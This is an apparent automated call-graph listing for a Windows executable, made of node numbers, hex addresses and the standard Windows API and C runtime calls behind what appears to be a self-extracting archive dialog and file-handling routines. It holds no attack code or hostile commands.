GetModuleHandleW 24650->24683 24653 6909f 24653->24649 24684 69225 GetModuleHandleExW 24653->24684 24657 690b3 24668 69151 24657->24668 24670 69128 24657->24670 24692 69ba0 20 API calls _abort 24657->24692 24659 6916e 24675 691a0 24659->24675 24660 6919a 24693 73540 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24660->24693 24662 69e51 _abort 5 API calls 24667 69140 24662->24667 24663 69e51 _abort 5 API calls 24663->24668 24667->24663 24672 69191 24668->24672 24670->24662 24670->24667 24671->24657 24694 6be31 LeaveCriticalSection 24672->24694 24674 6916a 24674->24659 24674->24660 24695 6c226 24675->24695 24678 691ce 24681 69225 _abort 8 API calls 24678->24681 24679 691ae GetPEB 24679->24678 24680 691be GetCurrentProcess TerminateProcess 24679->24680 24680->24678 24682 691d6 ExitProcess 24681->24682 24683->24653 24685 69272 24684->24685 24686 6924f GetProcAddress 24684->24686 24688 69281 24685->24688 24689 69278 FreeLibrary 24685->24689 24687 69264 24686->24687 24687->24685 24690 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24688->24690 24689->24688 24691 690ab 24690->24691 24691->24649 24692->24670 24694->24674 24696 6c241 24695->24696 24697 6c24b 24695->24697 24699 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24696->24699 24701 6be48 24697->24701 24700 691aa 24699->24700 24700->24678 24700->24679 24702 6be78 24701->24702 24706 6be74 24701->24706 24702->24696 24703 6be98 24703->24702 24705 6bea4 GetProcAddress 24703->24705 24707 6beb4 _abort 24705->24707 24706->24702 24706->24703 24708 6bee4 24706->24708 24707->24702 24709 6bf05 LoadLibraryExW 24708->24709 24714 6befa 24708->24714 24710 6bf22 GetLastError 24709->24710 24711 6bf3a 24709->24711 24710->24711 24712 6bf2d LoadLibraryExW 24710->24712 24713 6bf51 FreeLibrary 24711->24713 24711->24714 24712->24711 24713->24714 24714->24706 26024 41800 87 API calls Concurrency::cancel_current_task 26025 5b400 GdipDisposeImage GdipFree 24730 4b20a 24731 4b21f 24730->24731 24736 4b218 24730->24736 24732 4b22c GetStdHandle 24731->24732 24740 4b23b 24731->24740 24732->24740 24733 4b293 WriteFile 24733->24740 24734 4b264 WriteFile 24735 4b25f 24734->24735 24734->24740 24735->24734 24735->24740 24738 4b325 24742 47951 78 API calls 24738->24742 24740->24733 24740->24734 24740->24735 24740->24736 24740->24738 24741 4765a 79 API calls 24740->24741 24741->24740 24742->24736 26026 5d410 92 API calls _swprintf 24803 6a610 24811 6bf5f 24803->24811 24806 6a624 24808 6a62c 24809 6a639 24808->24809 24819 6a640 11 API calls 24808->24819 24812 6be48 _abort 5 API calls 24811->24812 24813 6bf86 24812->24813 24814 6bf9e TlsAlloc 24813->24814 24815 6bf8f 24813->24815 24814->24815 24816 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24815->24816 24817 6a61a 24816->24817 24817->24806 24818 6a589 20 API calls 2 library calls 24817->24818 24818->24808 24819->24806 24821 5f41c 24823 5f325 24821->24823 24822 5f9d9 ___delayLoadHelper2@8 14 API calls 24822->24823 24823->24822 26027 5741e 138 API calls __InternalCxxFrameHandler 26083 6961a 55 API calls _free 24825 5f31b 14 API calls ___delayLoadHelper2@8 26028 41025 29 API calls 26101 60723 20 API calls 26102 69320 52 API calls 3 library calls 24846 4ca2e 24847 4ca40 _abort 24846->24847 24850 523f4 24847->24850 24853 523b6 GetCurrentProcess GetProcessAffinityMask 24850->24853 24854 4ca97 24853->24854 26057 50534 FreeLibrary 26105 60737 29 API calls _abort 26029 42037 143 API calls __EH_prolog 26030 42430 26 API calls std::bad_exception::bad_exception 24880 5a530 24881 5a555 24880->24881 24882 5a53b 24880->24882 24882->24881 24884 5b181 24882->24884 24885 5b198 24884->24885 24886 5b18a 24884->24886 24885->24881 24886->24885 24888 5a6c1 24886->24888 24889 5a6d0 _wcslen ___std_exception_copy 24888->24889 24898 5a7f6 24888->24898 24889->24898 24899 53328 CompareStringW _wcslen 24889->24899 24891 5a749 _wcslen 24892 5a78b GlobalAlloc 24891->24892 24893 5a7a1 WideCharToMultiByte 24892->24893 24894 5a7c0 24892->24894 24893->24894 24895 5a7d4 CreateStreamOnHGlobal 24894->24895 24896 5a7e8 24895->24896 24895->24898 24900 5a59b 24896->24900 24898->24885 24899->24891 24907 5a5c4 24900->24907 24901 5a6b0 24901->24898 24903 5a67a 24903->24901 24904 5a680 ShowWindow SetWindowTextW 24903->24904 24906 5a6af 24904->24906 24906->24901 24907->24901 24908 5ad0e CompareStringW _wcslen ___std_exception_copy 24907->24908 24908->24903 26058 60530 46 API calls __RTC_Initialize 24910 4213d 24911 42150 24910->24911 24912 42148 24910->24912 24914 4214e 24911->24914 24915 5feae 27 API calls 24911->24915 24916 42162 27 API calls Concurrency::cancel_current_task 24912->24916 24915->24914 24916->24914 26032 5b440 GdipCloneImage GdipAlloc 26106 5e740 71 API calls 26059 61540 51 API calls 2 library calls 25852 5fd48 25853 5fd52 25852->25853 25854 5f9d9 ___delayLoadHelper2@8 14 API calls 25853->25854 25855 5fd5f 25854->25855 26034 4a850 81 API calls Concurrency::cancel_current_task 26061 46950 41 API calls __EH_prolog 26087 5fe51 48 API calls _unexpected 26035 5c450 101 API calls 26036 5a450 IsWindow 26037 6b850 31 API calls 2 library calls 26088 6b650 71 API calls _free 26089 71a50 IsProcessorFeaturePresent 26108 6c368 27 API calls 4 library calls 26004 41075 26005 504e5 41 API calls 26004->26005 26006 4107a 26005->26006 26009 60362 29 API calls 26006->26009 26008 41084 26009->26008 26065 42570 97 API calls 26040 58870 133 API calls 26066 61170 RaiseException _com_error::_com_error CallUnexpected 26091 63e7b 38 API calls 4 library calls 24715 5b080 24716 5b08f SetWindowLongW 24715->24716 24717 5b0a9 NtdllDefWindowProc_W 24715->24717 24720 5a812 24716->24720 24719 5b0a8 24719->24717 24721 5feae 27 API calls 24720->24721 24722 5a829 24721->24722 24724 5a859 24722->24724 24725 5b0be CLSIDFromString 24722->24725 24724->24719 24726 5b0ec 24725->24726 24726->24724 26068 6b580 21 API calls 2 library calls 26092 63a80 6 API calls 4 library calls 26109 60780 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26093 5d8c6 112 API calls 4 library calls 24743 5f595 24744 5f53e 24743->24744 24746 5f9d9 24744->24746 24772 5f737 24746->24772 24748 5f9e9 24749 5fa46 24748->24749 24750 5fa6a 24748->24750 24751 5f977 DloadReleaseSectionWriteAccess 6 API calls 24749->24751 24753 5fae2 LoadLibraryExA 24750->24753 24755 5fb43 24750->24755 24756 5fb55 24750->24756 24761 5fc11 24750->24761 24752 5fa51 RaiseException 24751->24752 24767 5fc3f 24752->24767 24754 5faf5 GetLastError 24753->24754 24753->24755 24758 5fb1e 24754->24758 24759 5fb08 24754->24759 24755->24756 24757 5fb4e FreeLibrary 24755->24757 24760 5fbb3 GetProcAddress 24756->24760 24756->24761 24757->24756 24763 5f977 DloadReleaseSectionWriteAccess 6 API calls 24758->24763 24759->24755 24759->24758 24760->24761 24762 5fbc3 GetLastError 24760->24762 24781 5f977 24761->24781 24764 5fbd6 24762->24764 24766 5fb29 RaiseException 24763->24766 24764->24761 24768 5f977 DloadReleaseSectionWriteAccess 6 API calls 24764->24768 24766->24767 24767->24744 24769 5fbf7 RaiseException 24768->24769 24770 5f737 ___delayLoadHelper2@8 6 API calls 24769->24770 24771 5fc0e 24770->24771 24771->24761 24773 5f743 24772->24773 24774 5f769 24772->24774 24789 5f7e0 24773->24789 24774->24748 24776 5f748 24777 5f764 24776->24777 24792 5f909 24776->24792 24797 5f76a GetModuleHandleW GetProcAddress GetProcAddress 24777->24797 24780 5f9b2 24780->24748 24782 5f989 24781->24782 24783 5f9ab 24781->24783 24784 5f7e0 DloadReleaseSectionWriteAccess 3 API calls 24782->24784 24783->24767 24785 5f98e 24784->24785 24786 5f9a6 24785->24786 24787 5f909 DloadProtectSection 3 API calls 24785->24787 24800 5f9ad GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24786->24800 24787->24786 24798 5f76a GetModuleHandleW GetProcAddress GetProcAddress 24789->24798 24791 5f7e5 24791->24776 24795 5f91e DloadProtectSection 24792->24795 24793 5f924 24793->24777 24794 5f959 VirtualProtect 24794->24793 24795->24793 24795->24794 24799 5f81f VirtualQuery GetSystemInfo 24795->24799 24797->24780 24798->24791 24799->24794 24800->24783 26043 41095 44 API calls 26044 5a490 GetClientRect CopyRect 26045 6d090 GetCommandLineA GetCommandLineW 26069 5d8c6 108 API calls 4 library calls 26070 5f59f 14 API calls ___delayLoadHelper2@8 26111 5c7a0 109 API calls 24828 6bda0 24829 6bdab 24828->24829 24831 6bdd4 24829->24831 24832 6bdd0 24829->24832 24834 6c0ba 24829->24834 24841 6be00 DeleteCriticalSection 24831->24841 24835 6be48 _abort 5 API calls 24834->24835 24836 6c0e1 24835->24836 24837 6c0ff InitializeCriticalSectionAndSpinCount 24836->24837 24840 6c0ea 24836->24840 24837->24840 24838 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24839 6c116 24838->24839 24839->24829 24840->24838 24841->24832 26113 60eff 9 API calls 2 library calls 24858 410b5 24863 4644d 24858->24863 24862 410c4 24864 46457 __EH_prolog 24863->24864 24872 4c9d8 GetCurrentProcess GetProcessAffinityMask 24864->24872 24866 46464 24873 504e5 24866->24873 24868 464bb 24877 4665c GetCurrentProcess GetProcessAffinityMask 24868->24877 24870 410ba 24871 60362 29 API calls 24870->24871 24871->24862 24872->24866 24874 504ef __EH_prolog 24873->24874 24878 44846 41 API calls 24874->24878 24876 5050b 24876->24868 24877->24870 24878->24876 26047 6b8b0 21 API calls 26048 69cb0 7 API calls ___scrt_uninitialize_crt 26071 73db0 VariantClear 26114 703b0 51 API calls 26072 5d8c6 98 API calls 4 library calls 26115 5d8c6 103 API calls 4 library calls 26075 721c5 21 API calls 2 library calls 24921 5c9c0 24922 5c9ca __EH_prolog 24921->24922 25087 412f6 24922->25087 24925 5ca21 24926 5d0fb 25164 5e7de 24926->25164 24927 5ca0a 24927->24925 24930 5ca18 24927->24930 24931 5ca7b 24927->24931 24935 5ca1c 24930->24935 24936 5ca58 24930->24936 24934 5cb0e GetDlgItemTextW 24931->24934 24940 5ca91 24931->24940 24932 5d124 24938 5d12d SendDlgItemMessageW 24932->24938 24939 5d13e GetDlgItem SendMessageW 24932->24939 24933 5d116 SendMessageW 24933->24932 24934->24936 24937 5cb4b 24934->24937 24935->24925 24941 4f937 53 API calls 24935->24941 24936->24925 24942 5cb3f KiUserCallbackDispatcher 24936->24942 24943 5cb60 GetDlgItem 24937->24943 25085 5cb54 24937->25085 24938->24939 25182 5b64d GetCurrentDirectoryW 24939->25182 24945 4f937 53 API calls 24940->24945 24946 5ca3b 24941->24946 24942->24925 24947 5cb74 SendMessageW SendMessageW 24943->24947 24948 5cb97 SetFocus 24943->24948 24950 5caae SetDlgItemTextW 24945->24950 25202 4122f SHGetMalloc 24946->25202 24947->24948 24954 5cba7 24948->24954 24965 5cbb3 24948->24965 24949 5d16e GetDlgItem 24952 5d191 SetWindowTextW 24949->24952 24953 5d18b 24949->24953 24955 5cab9 24950->24955 25183 5bbb0 GetClassNameW 24952->25183 24953->24952 24959 4f937 53 API calls 24954->24959 24955->24925 24962 5cac6 GetMessageW 24955->24962 24956 5ca42 24956->24925 24966 5d3e8 SetDlgItemTextW 24956->24966 24957 5d041 24961 4f937 53 API calls 24957->24961 24983 5cbb1 24959->24983 24967 5d051 SetDlgItemTextW 24961->24967 24962->24925 24963 5cadd IsDialogMessageW 24962->24963 24963->24955 24969 5caec TranslateMessage DispatchMessageW 24963->24969 24972 4f937 53 API calls 24965->24972 24966->24925 24968 5d065 24967->24968 24974 4f937 53 API calls 24968->24974 24969->24955 24976 5cbea 24972->24976 24973 5cc0d 24977 5cc41 24973->24977 25203 4b4c1 24973->25203 25001 5d088 _wcslen 24974->25001 24975 5d1dc 24982 4f937 53 API calls 24975->24982 24984 5d20c 24975->24984 24979 44a20 _swprintf 51 API calls 24976->24979 25109 4b341 24977->25109 24978 5d872 98 API calls 24978->24975 24979->24983 24988 5d1ef SetDlgItemTextW 24982->24988 25098 5e607 24983->25098 24989 5d872 98 API calls 24984->24989 25030 5d2c4 24984->25030 24986 5d374 24992 5d380 EnableWindow 24986->24992 24993 5d389 24986->24993 24997 4f937 53 API calls 24988->24997 24990 5d227 24989->24990 25014 5d252 24990->25014 25213 5aee5 ShowWindow 24990->25213 24991 5cc3b 25206 5beef CreateDirectoryW LocalFree GetCurrentProcess GetLastError 24991->25206 24992->24993 25000 5d3a6 24993->25000 25232 412b3 GetDlgItem EnableWindow 24993->25232 24994 5d0d9 24998 4f937 53 API calls 24994->24998 24995 5cc65 25115 5bc09 SetCurrentDirectoryW 24995->25115 24996 5cc5a GetLastError 24996->24995 25003 5d203 SetDlgItemTextW 24997->25003 24998->24925 25006 5d3cd 25000->25006 25018 5d3c5 SendMessageW 25000->25018 25001->24994 25017 4f937 53 API calls 25001->25017 25003->24984 25004 5d2b7 25008 5d872 98 API calls 25004->25008 25006->24925 25015 4f937 53 API calls 25006->25015 25007 5cc79 25011 5cc90 25007->25011 25012 5cc82 GetLastError 25007->25012 25008->25030 25010 5d39c 25233 412b3 GetDlgItem EnableWindow 25010->25233 25013 5cd07 25011->25013 25019 5cca0 GetTickCount 25011->25019 25020 5cd16 25011->25020 25012->25011 25013->25020 25022 5cf42 25013->25022 25014->25004 25037 5d872 98 API calls 25014->25037 25015->24956 25021 5d0bc 25017->25021 25018->25006 25028 44a20 _swprintf 51 API calls 25019->25028 25024 5cee7 25020->25024 25025 5cedd 25020->25025 25026 5cd2f GetModuleFileNameW 25020->25026 25031 44a20 _swprintf 51 API calls 25021->25031 25124 412d1 GetDlgItem ShowWindow 25022->25124 25023 5d355 25029 5aee5 40 API calls 25023->25029 25036 4f937 53 API calls 25024->25036 25025->24936 25025->25024 25207 505e6 83 API calls 25026->25207 25033 5ccbd 25028->25033 25029->24986 25030->24986 25030->25023 25034 4f937 53 API calls 25030->25034 25031->24994 25032 5cf52 25125 412d1 GetDlgItem ShowWindow 25032->25125 25116 4a8ce 25033->25116 25034->25030 25040 5cef1 25036->25040 25041 5d28c 25037->25041 25038 5cd57 25043 44a20 _swprintf 51 API calls 25038->25043 25044 44a20 _swprintf 51 API calls 25040->25044 25041->25004 25045 5d295 DialogBoxParamW 25041->25045 25042 5cf5c 25047 4f937 53 API calls 25042->25047 25046 5cd79 CreateFileMappingW 25043->25046 25049 5cf0f 25044->25049 25045->24936 25045->25004 25052 5cdd7 GetCommandLineW 25046->25052 25080 5ce4e __InternalCxxFrameHandler 25046->25080 25050 5cf66 SetDlgItemTextW 25047->25050 25060 4f937 53 API calls 25049->25060 25126 412d1 GetDlgItem ShowWindow 25050->25126 25051 5cce3 25055 5ccf5 25051->25055 25056 5ccea GetLastError 25051->25056 25053 5cde8 25052->25053 25208 5c605 SHGetMalloc 25053->25208 25058 4a801 81 API calls 25055->25058 25056->25055 25057 5cf78 SetDlgItemTextW GetDlgItem 25061 5cf95 GetWindowLongW SetWindowLongW 25057->25061 25062 5cfad 25057->25062 25058->25013 25064 5cf29 25060->25064 25061->25062 25127 5d872 25062->25127 25063 5ce04 25209 5c605 SHGetMalloc 25063->25209 25068 5ce10 25210 5c605 SHGetMalloc 25068->25210 25069 5d872 98 API calls 25071 5cfc9 25069->25071 25152 5eb92 25071->25152 25072 5ce1c 25211 50695 83 API calls 25072->25211 25074 5ceb7 25074->25025 25079 5cecd UnmapViewOfFile CloseHandle 25074->25079 25076 5ce2d MapViewOfFile 25076->25080 25078 5d872 98 API calls 25084 5cfef 25078->25084 25079->25025 25080->25074 25081 5cea3 Sleep 25080->25081 25081->25074 25081->25080 25082 5d018 25212 412b3 GetDlgItem EnableWindow 25082->25212 25084->25082 25086 5d872 98 API calls 25084->25086 25085->24936 25085->24957 25086->25082 25088 412ff 25087->25088 25089 41358 25087->25089 25090 41365 25088->25090 25234 4f608 62 API calls 2 library calls 25088->25234 25235 4f5e1 GetWindowLongW SetWindowLongW 25089->25235 25090->24925 25090->24926 25090->24927 25093 41321 25093->25090 25094 41327 GetParent 25093->25094 25094->25090 25095 41334 GetDlgItem 25094->25095 25095->25090 25096 41344 25095->25096 25096->25090 25097 4134a SetWindowTextW 25096->25097 25097->25090 25236 5c748 PeekMessageW 25098->25236 25101 5e635 25241 5a235 25101->25241 25102 5e669 SendMessageW SendMessageW 25104 5e6a5 25102->25104 25105 5e6c4 SendMessageW SendMessageW SendMessageW 25102->25105 25104->25105 25107 5e6f7 SendMessageW 25105->25107 25108 5e71a SendMessageW 25105->25108 25107->25108 25108->24973 25112 4b34b 25109->25112 25110 4b3dc 25111 4b542 8 API calls 25110->25111 25113 4b405 25110->25113 25111->25113 25112->25110 25112->25113 25244 4b542 25112->25244 25113->24995 25113->24996 25115->25007 25117 4a8d8 25116->25117 25118 4a935 CreateFileW 25117->25118 25119 4a929 25117->25119 25118->25119 25120 4cf32 GetCurrentDirectoryW 25119->25120 25122 4a97f 25119->25122 25121 4a964 25120->25121 25121->25122 25123 4a968 CreateFileW 25121->25123 25122->25051 25123->25122 25124->25032 25125->25042 25126->25057 25128 5d87c __EH_prolog 25127->25128 25129 5cfbb 25128->25129 25265 5c4f4 ExpandEnvironmentStringsW 25128->25265 25129->25069 25133 5db9a SetWindowTextW 25138 5d8b3 _wcslen _wcsrchr 25133->25138 25138->25129 25138->25133 25139 5d988 SetFileAttributesW 25138->25139 25151 5d9a2 _abort _wcslen 25138->25151 25266 53306 CompareStringW 25138->25266 25267 5b64d GetCurrentDirectoryW 25138->25267 25269 4b9ca 6 API calls 25138->25269 25270 4b953 FindClose 25138->25270 25271 5c66e 77 API calls 2 library calls 25138->25271 25272 6520e 25138->25272 25285 5c4f4 ExpandEnvironmentStringsW 25138->25285 25141 5da42 GetFileAttributesW 25139->25141 25139->25151 25141->25138 25143 5da54 DeleteFileW 25141->25143 25143->25138 25145 5da65 25143->25145 25144 5dd64 GetDlgItem SetWindowTextW SendMessageW 25144->25151 25146 44a20 _swprintf 51 API calls 25145->25146 25147 5da85 GetFileAttributesW 25146->25147 25147->25145 25149 5da9a MoveFileW 25147->25149 25148 5dda4 SendMessageW 25148->25138 25149->25138 25150 5dab2 MoveFileExW 25149->25150 25150->25138 25151->25138 25151->25141 25151->25144 25151->25148 25268 4cdc0 51 API calls 2 library calls 25151->25268 25153 5eb9c __EH_prolog 25152->25153 25297 5197c 25153->25297 25155 5ebcd 25301 464ed 25155->25301 25157 5ebeb 25305 48823 25157->25305 25161 5ec3e 25323 4890a 25161->25323 25163 5cfda 25163->25078 25165 5e7e8 25164->25165 25166 5b5c6 4 API calls 25165->25166 25167 5e7ed 25166->25167 25168 5e7f5 GetWindow 25167->25168 25169 5d101 25167->25169 25168->25169 25172 5e815 25168->25172 25169->24932 25169->24933 25170 5e822 GetClassNameW 25825 53306 CompareStringW 25170->25825 25172->25169 25172->25170 25173 5e846 GetWindowLongW 25172->25173 25174 5e8aa GetWindow 25172->25174 25173->25174 25175 5e856 SendMessageW 25173->25175 25174->25169 25174->25172 25175->25174 25176 5e86c GetObjectW 25175->25176 25826 5b605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25176->25826 25178 5e883 25827 5b5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25178->25827 25828 5b80c 8 API calls 25178->25828 25181 5e894 SendMessageW DeleteObject 25181->25174 25182->24949 25184 5bbf6 25183->25184 25185 5bbd1 25183->25185 25189 5c207 25184->25189 25829 53306 CompareStringW 25185->25829 25187 5bbe4 25187->25184 25188 5bbe8 FindWindowExW 25187->25188 25188->25184 25190 5c211 __EH_prolog 25189->25190 25191 413f8 43 API calls 25190->25191 25192 5c233 25191->25192 25830 42083 25192->25830 25195 5c24d 25197 41641 87 API calls 25195->25197 25196 5c25c 25198 41a7e 143 API calls 25196->25198 25199 5c258 25197->25199 25201 5c27b __InternalCxxFrameHandler ___std_exception_copy 25198->25201 25199->24975 25199->24978 25200 41641 87 API calls 25200->25199 25201->25200 25202->24956 25838 4b4d3 25203->25838 25206->24977 25207->25038 25208->25063 25209->25068 25210->25072 25211->25076 25212->25085 25846 5ac14 LoadCursorW RegisterClassExW 25213->25846 25215 5af0f 25216 5af25 25215->25216 25847 68a08 26 API calls 2 library calls 25215->25847 25218 5af3d GetWindowRect GetParent MapWindowPoints 25216->25218 25848 68a08 26 API calls 2 library calls 25216->25848 25221 5af77 DestroyWindow 25218->25221 25222 5af80 GetParent CreateWindowExW 25218->25222 25221->25222 25223 5b008 25222->25223 25224 5afcb 25222->25224 25225 5b00c ShowWindow UpdateWindow 25223->25225 25226 5b01e 25223->25226 25224->25223 25227 5afd0 25224->25227 25225->25226 25226->25014 25227->25226 25849 5ad0e CompareStringW _wcslen ___std_exception_copy 25227->25849 25229 5afe8 25229->25226 25230 5afee ShowWindow SetWindowTextW 25229->25230 25231 5b005 25230->25231 25231->25226 25232->25010 25233->25000 25234->25093 25235->25090 25237 5c763 KiUserCallbackDispatcher 25236->25237 25238 5c79c GetDlgItem 25236->25238 25239 5c779 IsDialogMessageW 25237->25239 25240 5c788 TranslateMessage DispatchMessageW 25237->25240 25238->25101 25238->25102 25239->25238 25239->25240 25240->25238 25242 5a23e DestroyWindow 25241->25242 25243 5a24b ShowWindow SendMessageW SendMessageW 25241->25243 25242->25243 25243->25102 25245 4b54f 25244->25245 25246 4b573 25245->25246 25247 4b566 CreateDirectoryW 25245->25247 25248 4b4c1 3 API calls 25246->25248 25247->25246 25252 4b5a6 25247->25252 25249 4b579 25248->25249 25250 4b5b9 GetLastError 25249->25250 25253 4cf32 GetCurrentDirectoryW 25249->25253 25251 4b5b5 25250->25251 25251->25112 25252->25251 25257 4b8e6 25252->25257 25255 4b58f 25253->25255 25255->25250 25256 4b593 CreateDirectoryW 25255->25256 25256->25250 25256->25252 25258 5ffc0 25257->25258 25259 4b8f3 SetFileAttributesW 25258->25259 25260 4b936 25259->25260 25261 4b909 25259->25261 25260->25251 25262 4cf32 GetCurrentDirectoryW 25261->25262 25263 4b91d 25262->25263 25263->25260 25264 4b921 SetFileAttributesW 25263->25264 25264->25260 25265->25138 25266->25138 25267->25138 25268->25151 25269->25138 25270->25138 25271->25138 25273 6a694 25272->25273 25274 6a6a1 25273->25274 25275 6a6ac 25273->25275 25286 6a7ee 25274->25286 25277 6a6b4 25275->25277 25283 6a6bd _abort 25275->25283 25278 6a65a _free 20 API calls 25277->25278 25281 6a6a9 25278->25281 25279 6a6e7 HeapReAlloc 25279->25281 25279->25283 25280 6a6c2 25293 6a7db 20 API calls __dosmaperr 25280->25293 25281->25138 25283->25279 25283->25280 25294 68e4c 7 API calls 2 library calls 25283->25294 25285->25138 25287 6a82c 25286->25287 25291 6a7fc _abort 25286->25291 25296 6a7db 20 API calls __dosmaperr 25287->25296 25289 6a817 RtlAllocateHeap 25290 6a82a 25289->25290 25289->25291 25290->25281 25291->25287 25291->25289 25295 68e4c 7 API calls 2 library calls 25291->25295 25293->25281 25294->25283 25295->25291 25296->25290 25298 51989 _wcslen 25297->25298 25332 41895 25298->25332 25300 519a1 25300->25155 25302 5197c _wcslen 25301->25302 25303 41895 79 API calls 25302->25303 25304 519a1 25303->25304 25304->25157 25306 4882d __EH_prolog 25305->25306 25345 4e298 25306->25345 25308 48855 25309 5feae 27 API calls 25308->25309 25310 48899 _abort 25309->25310 25311 5feae 27 API calls 25310->25311 25313 488c0 25311->25313 25355 55c54 25313->25355 25315 48a38 25316 48a42 25315->25316 25318 48ab5 25316->25318 25398 4b966 25316->25398 25317 48b1a 25321 48b5c 25317->25321 25404 41397 75 API calls 25317->25404 25318->25317 25376 490a2 25318->25376 25321->25161 25812 4a41a DeleteFileW DeleteFileW GetCurrentDirectoryW _abort 25323->25812 25325 4892b 25327 4893c Concurrency::cancel_current_task 25325->25327 25813 53536 25325->25813 25328 42111 26 API calls 25327->25328 25329 48963 25328->25329 25330 4e339 87 API calls 25329->25330 25331 4896b 25330->25331 25331->25163 25333 418ff 25332->25333 25334 418a7 25332->25334 25333->25300 25335 418d0 25334->25335 25342 476e9 77 API calls __vswprintf_c_l 25334->25342 25336 6520e 22 API calls 25335->25336 25338 418f0 25336->25338 25338->25333 25344 4775a 76 API calls 25338->25344 25339 418c6 25343 4775a 76 API calls 25339->25343 25342->25339 25343->25335 25344->25333 25346 4e2a2 __EH_prolog 25345->25346 25347 5feae 27 API calls 25346->25347 25348 4e2e5 25347->25348 25349 4e2f8 25348->25349 25350 46891 41 API calls 25348->25350 25351 5feae 27 API calls 25349->25351 25350->25349 25352 4e309 25351->25352 25353 4e31c 25352->25353 25361 46891 25352->25361 25353->25308 25356 55c5e __EH_prolog 25355->25356 25357 5feae 27 API calls 25356->25357 25358 55c7a 25357->25358 25359 488f2 25358->25359 25375 5215f 81 API calls 25358->25375 25359->25315 25362 4689b __EH_prolog 25361->25362 25367 60013 25362->25367 25364 468b7 25365 60013 41 API calls 25364->25365 25366 468d9 _abort 25365->25366 25366->25353 25368 6001f ___scrt_is_nonwritable_in_current_image 25367->25368 25369 6004a 25368->25369 25371 46920 25368->25371 25369->25364 25372 4692a __EH_prolog 25371->25372 25373 504e5 41 API calls 25372->25373 25374 46936 25373->25374 25374->25368 25375->25359 25377 490ac __EH_prolog 25376->25377 25405 413f8 25377->25405 25379 490c8 25380 490d9 25379->25380 25569 4b1d2 25379->25569 25384 49110 25380->25384 25417 41ad3 25380->25417 25383 4910c 25383->25384 25436 42032 25383->25436 25561 41641 25384->25561 25388 491b2 25440 4924e 25388->25440 25392 49211 25392->25384 25448 44264 25392->25448 25460 492c6 25392->25460 25396 4b966 7 API calls 25397 49139 25396->25397 25397->25388 25397->25396 25573 4d4d2 CompareStringW _wcslen 25397->25573 25399 4b97b 25398->25399 25403 4b9a9 25399->25403 25801 4ba94 25399->25801 25401 4b98b 25402 4b990 FindClose 25401->25402 25401->25403 25402->25403 25403->25316 25404->25321 25406 413fd __EH_prolog 25405->25406 25407 46891 41 API calls 25406->25407 25408 41428 25407->25408 25409 4e298 41 API calls 25408->25409 25410 41437 25409->25410 25411 5feae 27 API calls 25410->25411 25414 414ab 25410->25414 25412 41498 25411->25412 25412->25414 25416 4644d 43 API calls 25412->25416 25574 4c1f7 25414->25574 25415 41533 _abort 25415->25379 25416->25414 25418 41add __EH_prolog 25417->25418 25419 41b30 25418->25419 25425 41c63 25418->25425 25592 413d9 25418->25592 25421 41c9e 25419->25421 25419->25425 25426 41cab 25419->25426 25595 41397 75 API calls 25421->25595 25424 44264 116 API calls 25428 41ce9 25424->25428 25425->25383 25426->25424 25426->25425 25427 41d31 25427->25425 25429 41d64 25427->25429 25596 41397 75 API calls 25427->25596 25428->25427 25431 44264 116 API calls 25428->25431 25429->25425 25435 4b110 80 API calls 25429->25435 25431->25428 25432 44264 116 API calls 25433 41db5 25432->25433 25433->25425 25433->25432 25434 4b110 80 API calls 25434->25419 25435->25433 25437 42037 __EH_prolog 25436->25437 25439 42068 25437->25439 25610 41a7e 25437->25610 25439->25397 25615 4e395 25440->25615 25442 4925e 25619 526f1 GetSystemTime SystemTimeToFileTime 25442->25619 25444 491cc 25444->25392 25445 52ea4 25444->25445 25624 5ef9b 25445->25624 25449 44274 25448->25449 25450 44270 25448->25450 25459 4b110 80 API calls 25449->25459 25450->25392 25451 44286 25452 442a1 25451->25452 25453 442af 25451->25453 25455 442e1 25452->25455 25632 4395a 104 API calls 3 library calls 25452->25632 25633 42eb6 116 API calls 3 library calls 25453->25633 25455->25392 25457 442ad 25457->25455 25634 42544 75 API calls 25457->25634 25459->25451 25461 492d0 __EH_prolog 25460->25461 25464 4930e 25461->25464 25480 4973d Concurrency::cancel_current_task 25461->25480 25675 59c9d 118 API calls 25461->25675 25463 4a18d 25465 4a1c5 25463->25465 25466 4a192 25463->25466 25464->25463 25469 4932f 25464->25469 25464->25480 25465->25480 25707 59c9d 118 API calls 25465->25707 25466->25480 25706 48675 167 API calls 25466->25706 25469->25480 25635 466df 25469->25635 25471 49545 25478 49669 25471->25478 25471->25480 25678 48f6b 38 API calls 25471->25678 25473 49405 25473->25471 25676 4b5d6 57 API calls 3 library calls 25473->25676 25476 495ac 25677 68a08 26 API calls 2 library calls 25476->25677 25481 4b966 7 API calls 25478->25481 25483 496db 25478->25483 25480->25392 25481->25483 25482 49935 25685 4e4a9 97 API calls 25482->25685 25641 489c8 25483->25641 25486 4976c 25508 497c5 25486->25508 25679 44727 41 API calls 2 library calls 25486->25679 25489 49990 25490 49a3a 25489->25490 25495 499bb 25489->25495 25493 49a8c 25490->25493 25506 49a45 25490->25506 25498 49a2c 25493->25498 25689 48db3 120 API calls 25493->25689 25494 49a8a 25499 4a801 81 API calls 25494->25499 25496 49ae8 25495->25496 25495->25498 25501 4b4c1 3 API calls 25495->25501 25519 49b53 25496->25519 25550 4a14a 25496->25550 25690 4ab1c 25496->25690 25498->25494 25498->25496 25499->25480 25500 4a801 81 API calls 25500->25480 25502 499f3 25501->25502 25502->25498 25687 4a50a 98 API calls 25502->25687 25506->25494 25688 48b7c 124 API calls 25506->25688 25507 49ba2 25512 4bf0a 27 API calls 25507->25512 25508->25480 25509 498ed 25508->25509 25516 498f4 Concurrency::cancel_current_task 25508->25516 25680 487fb 41 API calls 25508->25680 25681 4e4a9 97 API calls 25508->25681 25682 4237a 75 API calls 25508->25682 25683 48f28 99 API calls 25508->25683 25684 4237a 75 API calls 25509->25684 25532 49bb8 25512->25532 25516->25489 25686 